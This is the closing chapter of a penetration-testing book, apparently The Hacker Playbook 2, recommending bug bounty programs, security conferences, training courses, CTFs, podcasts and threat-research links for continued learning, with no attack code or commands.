Continuing Education 


So, you have just finished this book and may have a thirst for more. One of the most important factors 
in succeeding in this field is experience, not just learning from books and videos. Start 
learning from labs and vulnerable VMs. If you do not currently work for a penetration testing 
company, start working on bug bounties. Bug bounties are legal ways to find security bugs on 
production sites. Remember to read ALL the fine print before doing any testing. 


Bug Bounties: 


e https://bugcrowd.com/list-of-bug-bounty-programs 
e http://www.bugsheet.com/bug-bounties 


Secondly, if you aren't involved in the security community, you're doing it wrong! It is easy to get 
involved. There are a ton of local security groups in every city: 


B-sides: http://www.securitybsides.com/w/page/12194156/FrontPage 
OWASP: https://www.owasp.org/index.php/OWASP_Chapter 
Hacker Spaces: http://hackerspaces.org/wiki/List_of_hackerspaces 


Major Security Conferences: 


If you are looking for the bleeding-edge research, security conferences are the place to go. It is a great 
place to meet like-minded individuals, get your hands dirty, and learn. Two major websites that have 
a great list of security conferences are: 


e https://secore.info/conferences 
e http://infosecevents.net/calendar/ 


I will give you a small sample of the conferences that I would recommend from personal experience 
(in no particular order): 
• DefCon (http://www.defcon.org/) - This is one of the largest hacker conferences in the world and 
takes place in Las Vegas, NV. This conference is a must and is relatively affordable. 
• DerbyCon (https://www.derbycon.com/) - Another relatively low-cost conference, which takes place 
in Kentucky. Some of my favorite talks have come from DerbyCon. 
• BlackHat (http://www.blackhat.com/) - This conference is also held in Las Vegas, NV and is directed 
more toward corporate employees. It has great speakers, but is extremely expensive. 
• Bsides (http://www.securitybsides.com/) - There are Bsides conferences all over the country and 
they are usually FREE. Find yours! 
• ToorCon (http://toorcon.net/) - This is one of the smaller conferences and is held in San Diego, CA. 
You will meet a lot of new people here and everyone is pretty friendly. 
• CanSec (http://cansecwest.com/) - CanSecWest is one of the more technical conferences. Although 
extremely pricey, it is best known for its Pwn2Own contest. 
• Shmoocon (http://www.shmoocon.org/) - One of the largest conferences on the east coast and 
usually under $200. This is one of my favorite conferences. 
• OWASP AppSec (https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference) - Cheap 
and fun conference focused on web application security. Cost is typically under $100 if you are an 
OWASP member. 
• Lethal (http://www.meetup.com/LETHAL/) - Of course, I have to include my group. Although it is not 
a conference, we have monthly meetups and have presenters. Not only is it free, but the group is 
small, so it is easy for you to get involved and meet others with similar interests. If you are in the 
LA/Orange County CA area, come by! 
• The Ethical Hackers Club (TEHC) - This is one of my old groups in the Maryland area. TEHC is open 
for anybody with or without experience in network and computer security. They offer an open forum 
of discussion and informal training on anything network and computer security related. Sign up at 
www.t-e-h-c.com or http://www.meetup.com/ethical-hacker-club. 


But don’t forget, sometimes the best conferences are those that are local. They might not have the most 
famous speakers or most professional setting, but this is where you will find people just like you. I 
find that the people at the local events are much more open to sharing and working on projects 
together. 


Training Courses: 


If you are looking for a jumpstart into a particular field in security, you would most likely benefit 
from a training course. Since there are so many different training courses to choose from, here are 
some recommendations: 
• BlackHat - This one is pretty expensive, but it offers a lot of different courses, which are taught by 
some of the best. 
• DerbyCon - Well-priced training in Kentucky that occurs during the conference. 
• SANS (http://www.sans.org) - Expensive training, but they are the industry standard. 
• Offensive Security (http://www.offensive-security.com/) - Well-priced, and I highly recommend 
taking the online Offensive Security courses. You get a lot of great hands-on experience, but will 
need to invest a lot of time. 
• Exodus (https://www.exodusintel.com/training.html) - Excellent training for advanced vulnerability 
research and exploitation. 


Free Training: 


• Offensive Computer Security FSU: http://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/ 
• PentesterLab: https://pentesterlab.com/exercises/ 
• Cybrary: http://www.cybrary.it/ 
• Open Security Training: http://opensecuritytraining.info/Training.html 
• Coursera: https://www.coursera.org 
• EdX: https://www.edx.org/ 


Capture The Flag (CTF) 


If you plan to make this your profession or even if you do this for fun, you really need to get involved 
with different CTF challenges. Try to find a few friends or maybe find your local security group to 
attempt these challenges. Not only will it test your skill and understanding of attacks, but you will 
also be able to better connect with other people in the industry. Spending three days and nights doing 
a challenge is probably one of the most rewarding experiences. 

Go visit https://ctftime.org and find out where and when the next CTFs are. If you are in the Orange 
County, CA area, stop by www.meetup.com/lethal and join one of our teams! 


Keeping Up To Date 


Here is the list of RSS feeds I monitor on a daily basis. I keep it small enough that I can quickly 
look through it all in a matter of minutes: 

• http://www.securepla.net/rss.php 

Mailing Lists 

• Seclists.org has taken over what used to be Full Disclosure. This is a vendor-neutral forum for 
detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, 
and events of interest to the community. 
  o http://seclists.org/fulldisclosure/ 
• Dragon News Bytes - Great topics on everything such as privacy, tools, malware, attacks, 
presentations, and more. 
  o https://www.team-cymru.org/News/dnb.html 


Podcasts 


I have actually moved over to listening to podcasts versus just reading RSS feeds. Are you looking 
for bleeding-edge security issues being discussed by some of the best? Take a spin through some of 
these: 


• Brakeing Down Security - http://brakeingsecurity.blogspot.com/ 
• Risky Business - http://risky.biz/netcasts/risky-business 
• Security Now - https://www.grc.com/securitynow.htm 
• Security Weekly - https://securityweekly.com/podcasts/ 
• The Social-Engineer Podcast - http://www.social-engineer.org/category/podcast/ 
• Hak5 - https://itunes.apple.com/us/podcast/hak5-quicktime-large/id117137282?mt=2 
• SecuraBit - https://itunes.apple.com/us/podcast/securabit/id280048405 


Learning From The Bad Guys 


When I teach my penetration testers, one of the most important things I tell them is to watch what the 
bad guys do. Not only does it help extend the attack process, but it also helps with lateral movement 
and learning what works in the real world. One of the main reasons my clients hire me is to emulate 
what the bad guys might do. If you are using theoretical attacks, this might not be as beneficial as 
using the tactics that their adversaries might try to do. 


Also, make sure you learn about your client's industry. If the adversaries targeting that industry lean 
on malicious PDFs rather than credential compromise, you might want to focus your attacks on those 
types. The more you can emulate their patterns, the better the company can protect itself against its 
most immediate threats. 


Some Examples: 


Kerberos Golden Ticket Attacks and Sticky Keys 
• http://blog.cobaltstrike.com/2015/01/07/pass-the-golden-ticket-with-wmic/ 

FireEye/Mandiant APT Tools and Techniques 
• https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf 

CrowdStrike Blog 
• http://blog.crowdstrike.com/ 

Verizon Data Breach Report 
• http://www.verizonenterprise.com/DBIR/2014/reports/rp_Verizon-DBIR-2014_en_xg.pdf 

Skeleton Key Attack 
• http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/ 

For any good penetration tester, doing research should be half your time. Learning what the bad guys 
do and being able to emulate them will be useful to your job, and even more useful to your client. 


Final Notes 


Now, you have fully compromised the SUCK organization, cracked all the passwords, found all of 
their weaknesses, and made it out clean. It is time to take everything you learned and build on top of 
that. I have already recommended that you get involved with your local security groups and/or 
participate in security conferences. You can also start a blog and start playing with these different 
tools. Find out what works and what doesn't and see how you can attack more efficiently and be 
quieter on the network. It will take some time outside your normal 9-to-5 job, but it will definitely be 
worth it. 


I hope you have found the content in this book to be something of value and picked up some tips and 
tricks. I wrote this second book mainly because security is always changing and it is really important 
to stay on top of your game. As I have emphasized throughout this book and the prior one, there isn’t a 
point when you can say you have mastered security. However, once you have the basics down pat, the 
high-level attacks don’t really change. We see time and time again that old attacks come back and that 
you always need to be ready. 


If you did find this book to be helpful, please feel free to leave me a comment on the book’s website. 
It will help me to continue developing better content and see what topics you would like to hear more 
about . If I forgot to mention someone in this book or I misspoke on a topic, I apologize in advance 
and will try my best to provide updated/corrected information on the book website. 


Subscribe for Book Updates: 


http://thehackerplaybook.com/subscribe 
Twitter: @HackerPlaybook 

URL: http://TheHackerPlaybook.com 
Github: https://www.github.com/cheetz 
Email: book@thehackerplaybook.com 


*From the last book, I know that many of you downloaded copies of my book through less than legal 
means. Although I don’t promote it, I am glad that I was able to share my knowledge and hope this 
continues your interest in computer security. If you did happen to stumble on this copy somewhere on 
the “internets” and did like my book, feel free to donate to the BTC address below. All proceeds will 
go directly to LETHAL (http://www.meetup.com/lethal/) to promote the growth of our security 
community. 


Happy Hacking! 